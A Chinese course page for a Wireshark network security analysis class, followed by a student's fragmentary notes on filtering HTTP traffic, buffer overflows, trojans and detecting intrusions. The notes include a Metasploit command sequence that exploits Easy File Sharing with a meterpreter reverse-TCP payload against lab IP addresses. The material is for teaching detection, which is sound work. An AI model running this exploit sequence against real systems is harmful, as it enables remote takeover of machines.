3164人加入学习
(9人评价)
WireShark网络安全分析
价格 ¥ 499.00
音频听课 手机端支持一键听课 (试一试)

 

追踪流

tcp流

http流

请求方法:

get

host

User-Agent

URI

GET请求获取由Request-URI

http.request.method == "GET"

发现登录敏感信息

http.request.method == "POST"

 

msf

metasploit

msf5> search EasyfileSharing

msf5> use exploit/windows/http/easyfilesharing

set payload windows/meterpreter/reserse_tcp

缓冲区大小

IDA

复制出来copy

入侵请求特征:

1、get

2、4061bit

3、结束位

Wireshark的查找功能

使用正则表达式

服务器感染木马,去连接客户端

 

正向木马和反向木马

冰河

灰鸽子

PE文件,可移植可执行的文件

exe,sys,ini,

metasploit

metaspoit

search EasyfileSharing

msf5>use exploit/

show options

set payload windows/meterpreter/reverse_tcp

set lhost 192.168.223.233

set rhost 192.168.223.137

set rpost 80

exploit

trunctated 截断

构造数据包(填充)

未做输入做验证

指标---木马文件

IDA

反编译

GET

get请求

C语言越界

前面填充,后面越界

4061字节

GET请求

HTTP/1.1

wireshark有查找功能

逐个查找

缓冲区溢出攻击

服务器访问客户端----syn

服务器发起syn

 

PE文件,program execute

防火墙规则

黑客的端口映射技术

 

 

 

 

 

 

 

 

[展开全文]